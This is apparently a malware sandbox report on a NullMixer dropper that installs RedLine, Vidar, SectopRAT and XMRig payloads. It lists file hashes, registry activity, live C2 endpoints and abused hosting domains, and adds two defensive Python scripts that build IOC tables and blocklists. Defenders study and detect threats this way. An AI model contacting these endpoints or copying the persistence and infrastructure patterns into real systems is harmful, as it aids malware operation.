SHA1 f570b98814687d730a409db056ec9afea9206758
SHA256 616a0cc53aa7ae199ac985d8cc545dba2d9ba15bd27c9baa32bb3c9876b875a0
SHA512 6a46f3b31ee1a37d7458432ee2d3fd630df7bd29f248bed38cb631b545e68b85742e587580902bc5daf2604d649c86a4d318500246361f48ed58a58f8443fad1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d2f3d7662156d79d501168854ba7abe6
SHA1 19671aabbbcc1ea2c1aec6c26cdab1d3e1e1a868
SHA256 4deb9de2a86ca348e461ef94c1687cd3a58ee78fac78d9c297affd64c4e17333
SHA512 8e7a61d1e5208ed1809143a19d2b0f4affa20b80117a09f195fcca2d903979041cb30212932fe80561c31d8ec8ee5d8aa177d2e69504e5a16418dae3f35f03b0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 740af178c8807886f77382c6a0bcb167
SHA1 73b7d12c8f29b1e7d0ce420249039320fbedfe9f
SHA256 9bf11adf85c9a09c1d2aa3df19f0ee8bd3938b5d35cefdf5c436355d0ff9e39e
SHA512 882e6a4f75c021d66f5150f029b29eba2a5c6874f1091f1d8195095fdfb4387a11b9886c4212a1c48c25b1fa2139032ac39969d9d21222f5913e9030b3aa32bb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ce75ec67429098a8e34149a6b07f666c
SHA1 36029e0c1dad47814a923ca1906a57e983e33204
SHA256 70d7ab9afc1d778e828a956c644c0f0cb2a6aec3688b7038451678444e9d5c46
SHA512 58548a0bb7a4306a3653cade59d50c10e7d21346973e5e52457e7476ee40b57a4b1ab06666ad35df623b827af07ed66bb44d72d748709b28613ec063add8fafa

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ab7e75accdb0dddb4378e3ffef914713
SHA1 47934a23a6f5acac29155bfc5e0053c7ed964e68
SHA256 b13048a1140a44affb2f6f1652cccdba752417186f202528fee504f3d4284018
SHA512 5f1a778a0487ed88e69e97390b4f7e1404f9888e7f3501337ba33b08b5e2eb7154bd93a7bad31a02238df8eaf817b284cd852c79d39d1cc302f1fe7faf09b111

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 940ec3c43a409e9e8cb7707bb397bc63
SHA1 1711a242d8edd46a59b922ddbd2818d64567350d
SHA256 c9affb6d76681684f4e05f1e60392a5ded5fd75e0e7560c6c4eb9163f93e712a
SHA512 79057d32b31d73ea17c013f127941cc13f7161d0aca873722569cd8e56f9998821f06d520f7f54a3d54750c58b2959be42c31a2ffdce40f14b3268e676d7a24d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 bf2b8babd1517ca2f37d53866fa8eb64
SHA1 9f75708a8fac7789df3f18b27c0f99c039998eeb
SHA256 70d5b6161a5916f7b7fdfe5ffcff16cc69052acb58f12ac1607233e1a603372d
SHA512 1df4f9929c5979ac3a30545af04d948d57a497e90a41ed5a6df9d9f2636084d84dcc6fe7a01bd15d909e9a395b320dc3ccedea9ddfeac390744c167d88616e3a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c53f7d51a540b5cc7a64887cfc37b653
SHA1 471c41bf9d3df27ecf94ceabf2cb1dd261ba864f
SHA256 0f4aeba46469f81e5602c6aecd1f6bba9310cfdeba104347870efeea2dc22968
SHA512 a13a39d544ab355ca4b1d98d50f158c4c690bbbe558c1fde0a2d0974acaef0a70a196e66f495b032807a66c388f8bdae4e339c4fa41794fb5cb4565d9a525098

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 81af0655573bae6402ad1202df2d4d15
SHA1 bbbf6ed4a18581a3cbf86e9f0324f85eb7c66c7d
SHA256 ba12cfe2d6c7749f881e571be5425aa6faf45531bcb40bd6b1be6abb435fccf2
SHA512 74698be3a88a79d54e41502c59721e308fc5bea5d3a79dd2eba9b76c233a5fc4a5cdbebedc56453f2c04b94b8ff8f2c73d0c765e28e17d40cb50ad1edae7af6a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ecdf5a0a8b9a0d21535d862bf8fa28c9
SHA1 e5fa1d176fe45064abefc4460c009944bc96b923
SHA256 d97bfd8a447c7767a04cf6d124acc891357e3d8e5cd474c789d4d585290fb7d9
SHA512 4d729d32d904e3762bad0100b7124ffc04c4fb9d8dd0e70403a92aa9c8a50ce80df1de8cabef12c381d2dfbe14230fe1eb4d2c52b58132182ddb799b4edc1e1b

memory/2336-770-0x000000013F930000-0x000000013F936000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ca60fb44436f4df836f36295ec6b0beb
SHA1 016ec87aeb336b40fa89ad7018bf41e55f2b7820
SHA256 18e053ef80d03961959dea5c77b3c9271f50ab36f89950e5361230844b226240
SHA512 dd774a2197b3c3fc82a894625478c69858102a90ce5f9a6b8db7a1b94b57598726e6416257854bbdc8e6542ea9d75d333323339e1fbfcc891f523c20efadfd80

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 89489a173dd5d2d0764e0512fe893dd5
SHA1 37ddd9ae26022a9f1efd2191d2e56be99eb95d22
SHA256 b1d2c97f15fceb8cbfcdb8941fb581c70b8d2de4a9e18c0d6e21ad6c35312490
SHA512 7545ab9f550730f9bc4b26beb351e0b536cf0f89f909b746ff3e0261c31a24ba195af44b165fb5ba53ad79e12f2050f186eb8a430e882a8c57ee9048cb6cc46f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c9fc01202c7060350a8e5f2b0fdb2013
SHA1 cd1e0160177ca3aabf9c0d1be662ce8127747e3f
SHA256 417a6d935979067a4e420e34794dab74607bbdfa51d18fd588af16111d452c90
SHA512 fe84238656104d70b1d07bd7f9ad7bc0c59a07977c85642c6b0b6d6e09685c6f66e3b8c100c34073ee69cbe11be05500d6544c1d9780568b4cae5ca6e5682b2d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 81cda058bc34d4a3150bd4016e51cea0
SHA1 f12bd32b289d88c5653aeca766a10c2bfcd2933d
SHA256 c51be7437622bcc0b39a7777b81436536dc84893395ec58d9df5d82b98bfd102
SHA512 96c1fae38c77b92807a8e5f4b4756758d1d48a9e983bbe9740a31bbf7859e4ffdbbd55f789d93eba9510bfa067ea6673943f58495e37f6ea6517f0b269d122b0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2e51e35d8d30ad12bf15259e5b38e895
SHA1 25e1a6406f507e4133a29b64a0fa1f6e0dedb920
SHA256 6d6478f9d9766ecaebd1c5f98d03bda0cb9e92c6d8ecd96fc3cb1f26b2c57c58
SHA512 6dbfc9b2b93b34d028ec2b3a586874ca92d91c339e279db721eeba522a57e3f52db0205b3b2d8caeea980eab79bdff870cc7a9dc753f185de3649dbc860af51e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bf6bd5253aef62752da181dc76f1ecca
SHA1 4e99aa95728b4cd95e5f60429354a820d5e00a68
SHA256 2a705696f830323c2b3f3c3850f22007a1efbc4cfbf06d317f389a67cc3240a0
SHA512 b1ef3981889f8d48d1770de13e1539280b5dc045098393444604515cfd8d92f9052b932985cb82b96bfb0c464fbdc1cff3816b04058495a83bdb9c79562a2997

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f32e3a5899bd1fb40609f2eb02d4f210
SHA1 87db7c11afb7397ff90b4b55f7782c49c62afe3a
SHA256 99a05549611ea85b6fcc6ec0cb8c9b830a637af8a72d171f3cd44918b0b84901
SHA512 6af21bce6ecad712a33880a708934f8a7e641ed985737261da485ccff9a518fdc4c666e95dfd2648bc6aefe4627b0d69198eb980cfcce4e2c9d4d872a9bc2e3a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 12b062be1b3533eb2dc1870127f05673
SHA1 5f6adb5b81db69628d155c965ffee5f02a4f7711
SHA256 0a7d7ca5fb5c829406e424041714b9f27020ffc9df551bb3107e79f343c1f8d5
SHA512 22522141c9f7ce2334915fd039d26594c5c68abd3a0f467397f41dba37588abcce7deff32113e2af284e337bb6fad5cc6d777bd05217af188cb77a11146c7413

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 337ec9f9e5b12c3cb6eff22708c4d311
SHA1 3f360caf2ea1b8f8b1d5894c58fd1f959e00857c
SHA256 15d34e62f7111345e95cfc965eaa0945eb97dec4e09c67c77de6820cf91add9e
SHA512 4b62e056f15070b7b573c572ca4e6e4cdbc3e937846f8e3f070a7b34e50a8c06c8089cde17de0490a245e04bd7c8496d4e44eaa94844bfe2d520474ac736e330
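
The file listing above mixes three kinds of entry: dropped binaries worth tracking, memory dumps (listed without hashes), and files Windows writes during any detonation (CryptnetUrlCache CRL/CTL metadata, Content.IE5 cache, Cab*.tmp/Tar*.tmp cabinet extraction). Note also that the 7-Zip SFX extraction directory is random per run (7zSC38EDBB6 here, 7zS4591E257 in behavioral2), so the hash is the stable indicator and the path is not. The script below is an added example for this write-up, not sandbox output and not code from any of the families named above; it parses the listing format used on this page, drops the noise, and emits one row per SHA256 with run-independent paths. The noise rules and the path normalisation are this example's assumptions, and the sample text is an excerpt of the entries above.

```python
"""Turn the report's 'Files' listing into a de-duplicated IOC table.

Added example; not sandbox output and not code from any malware family named
in the report. Input format assumed: a path line followed by 'MD5 <hex>' /
'SHA1 <hex>' / 'SHA256 <hex>' / 'SHA512 <hex>' lines; memory dumps appear as
'memory/<pid>-<n>-<start>-<end>-memory.dmp' with no hashes.
"""
import re
from dataclasses import dataclass, field

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
MEMDUMP_RE = re.compile(r"^memory/\d+-\d+-0x[0-9A-Fa-f]+-0x[0-9A-Fa-f]+-memory\.dmp$")
# Per-run random 7-Zip SFX extraction directory: the path changes every
# detonation, the hash of the file inside it does not.
SFX_DIR_RE = re.compile(r"\\7zS[0-9A-F]+\\", re.I)
# Written by Windows itself (CRL/CTL cache, IE cache, cabinet extraction);
# present in nearly every detonation, so not indicators of this sample.
# Assumption of this example, not a sandbox classification.
NOISE_RES = (
    re.compile(r"\\CryptnetUrlCache\\", re.I),
    re.compile(r"\\Content\.IE5\\", re.I),
    re.compile(r"\\Temp\\(Cab|Tar)[0-9A-F]{4}\.tmp$", re.I),
)


@dataclass
class FileEntry:
    path: str
    hashes: dict = field(default_factory=dict)


def parse_files_section(text: str) -> list:
    """Group each path line with the hash lines that follow it."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_RE.match(line)
        if m and current is not None:
            current.hashes[m.group(1)] = m.group(2).lower()
        else:
            current = FileEntry(path=line)
            entries.append(current)
    return entries


def classify(entry: FileEntry) -> str:
    if MEMDUMP_RE.match(entry.path):
        return "memory_dump"
    if any(r.search(entry.path) for r in NOISE_RES):
        return "windows_noise"
    return "payload_candidate"


def normalize_path(path: str) -> str:
    """Drop the drive letter and the random SFX dir so paths compare across runs."""
    path = re.sub(r"^[A-Za-z]:", "", path)
    path = SFX_DIR_RE.sub(lambda _m: "\\7zS<random>\\", path)
    return path.lower()


def build_ioc_table(entries) -> dict:
    """SHA256 -> {md5, paths}; payload candidates only, one row per hash."""
    table = {}
    for e in entries:
        if classify(e) != "payload_candidate" or "SHA256" not in e.hashes:
            continue
        row = table.setdefault(e.hashes["SHA256"], {"md5": e.hashes.get("MD5"), "paths": set()})
        row["paths"].add(normalize_path(e.path))
    return table


# Constructed excerpt of the report's own listing (abbreviated to MD5/SHA1/SHA256).
SAMPLE = r"""
\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 3394285ab7e1ef48bc775f71ed7b0a76
SHA1 646fadf1a0a0dafe07319c86de0587ed96a0fc2b
SHA256 732b086183981289f4dff07f2054fa1356bba8d975359e2f40b6f1adae084467

memory/2704-51-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\6f1aa71747b4a291.exe

MD5 2b32e3fb6d4deb5e9f825f9c9f0c75a6
SHA256 8bd8f7a32de3d979cae2f487ad2cc5a495afa1bfb1c740e337c47d1e2196e1f2

C:\Windows\winnetdriv.exe

MD5 01ad10e59fa396af2d5443c5a14c1b21
SHA256 bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137

C:\Users\Admin\AppData\Local\Temp\CabBE81.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 799f3adcfbb6596256a7c7b1e0237480
SHA256 616a0cc53aa7ae199ac985d8cc545dba2d9ba15bd27c9baa32bb3c9876b875a0
"""

if __name__ == "__main__":
    for sha, row in build_ioc_table(parse_files_section(SAMPLE)).items():
        print(sha, row["md5"], sorted(row["paths"]))
```

Feed it the whole Files section of each behavioral run and the tables will line up on SHA256 even though every run extracted into a different 7zS directory; the same hash appearing under several normalised paths (for example both IXP000.TMP and a 7zS directory) is itself useful, since it shows which stage re-dropped which payload.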

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-06 12:12

Reported

2024-12-06 12:15

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe"

Signatures

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Vidar

stealer vidar

Vidar family

vidar

Xmrig family

xmrig

xmrig

miner xmrig

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\services64.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\6f1aa71747b4a291.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\24ebc9ce784c63.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\621c13b77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\caa4baaf544.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Windows\winnetdriv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A
N/A api.db-ip.com N/A N/A
N/A ipinfo.io N/A N/A
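
The hostname indicators in the two tables above fall into two groups: public-IP/geolocation lookups (ipinfo.io, api.db-ip.com), which stealers use to tag the victim record, and legitimate services used as dead drops or payload hosts (iplogger.org, pastebin.com, raw.githubusercontent.com), which cannot simply be blocked. The repeated bare-IP connections in the Network list (45.142.213.135:30058, 37.0.10.236:80) are the endpoints actually worth a firewall rule. The script below is an added example for this write-up, not sandbox output and not code from any of the families named above; it parses the report's '<CC> <ip>:<port> [hostname] <proto>' rows, counts hits per endpoint, and classifies hostnames with the groupings just described. The category lists are this example's assumptions, not a vendor feed, and the sample rows are copied from the Network list above.

```python
"""Classify the report's network destinations and hostname indicators.

Added example; not sandbox output and not code from any malware family named
in the report. Row layout assumed: '<CC> <ip>:<port> [hostname] <proto>'.
"""
import re
from collections import Counter

ROW_RE = re.compile(
    r"^(?P<cc>[A-Z]{2})\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)"
    r"(?:\s+(?P<host>[A-Za-z0-9.-]+\.[A-Za-z]{2,}))?\s+(?P<proto>tcp|udp)$"
)

# Groupings are this example's assumptions about what each hostname tells a defender.
IP_LOOKUP_SERVICES = {"ipinfo.io", "api.db-ip.com"}  # victim public IP / geolocation
ABUSED_LEGIT_HOSTING = {"iplogger.org", "pastebin.com", "raw.githubusercontent.com"}  # dead drop / payload / tracking
MICROSOFT_BACKGROUND = {"ieonline.microsoft.com"}  # OS/browser background traffic, not sample-specific
COMMON_WEB_PORTS = {80, 443}


def parse_rows(text: str) -> list:
    rows = []
    for raw in text.splitlines():
        m = ROW_RE.match(raw.strip())
        if m:
            rows.append({"cc": m["cc"], "ip": m["ip"], "port": int(m["port"]),
                         "host": m["host"], "proto": m["proto"]})
    return rows


def classify_host(host: str) -> str:
    if host in IP_LOOKUP_SERVICES:
        return "external_ip_lookup"
    if host in ABUSED_LEGIT_HOSTING:
        return "abused_legitimate_hosting"
    if host in MICROSOFT_BACKGROUND:
        return "microsoft_background"
    return "unknown_host"


def triage(rows: list, min_repeats: int = 3) -> dict:
    """Count connections per endpoint; bare IPs on odd ports are the C2 candidates."""
    counts = Counter((r["ip"], r["port"], r["host"]) for r in rows)
    findings = []
    for (ip, port, host), n in counts.most_common():
        if host:
            category = classify_host(host)
        elif port not in COMMON_WEB_PORTS:
            category = "bare_ip_nonstandard_port"  # strongest C2 candidate
        else:
            category = "bare_ip_web_port"  # payload download or C2 over 80/443
        findings.append({"endpoint": f"{ip}:{port}", "host": host, "hits": n,
                         "category": category,
                         "beacon_like": host is None and n >= min_repeats})
    block = sorted(f["endpoint"] for f in findings if f["category"].startswith("bare_ip"))
    return {"findings": findings, "block_candidates": block}


# Constructed from the report's own Network rows above.
NETWORK_SAMPLE = """
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
"""
# Hostnames from the two indicator tables above.
FLAGGED_HOSTS = ["iplogger.org", "raw.githubusercontent.com", "pastebin.com", "ipinfo.io", "api.db-ip.com"]

if __name__ == "__main__":
    result = triage(parse_rows(NETWORK_SAMPLE))
    for f in result["findings"]:
        print(f)
    print("block:", result["block_candidates"])
    print({h: classify_host(h) for h in FLAGGED_HOSTS})
```

The split matters operationally: the bare-IP endpoints go straight to a blocklist, the IP-lookup and hosting domains go to a watchlist (a host resolving pastebin.com and iplogger.org within seconds of an unsigned Temp executable starting is the detection, not the domain itself), and the Microsoft endpoint is dropped so it does not pad the indicator count.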

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4948 set thread context of 2040 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 3936 set thread context of 5796 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4591E257\621c13b77.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe N/A

Enumerates system info in registry

Description Indicator Process Target
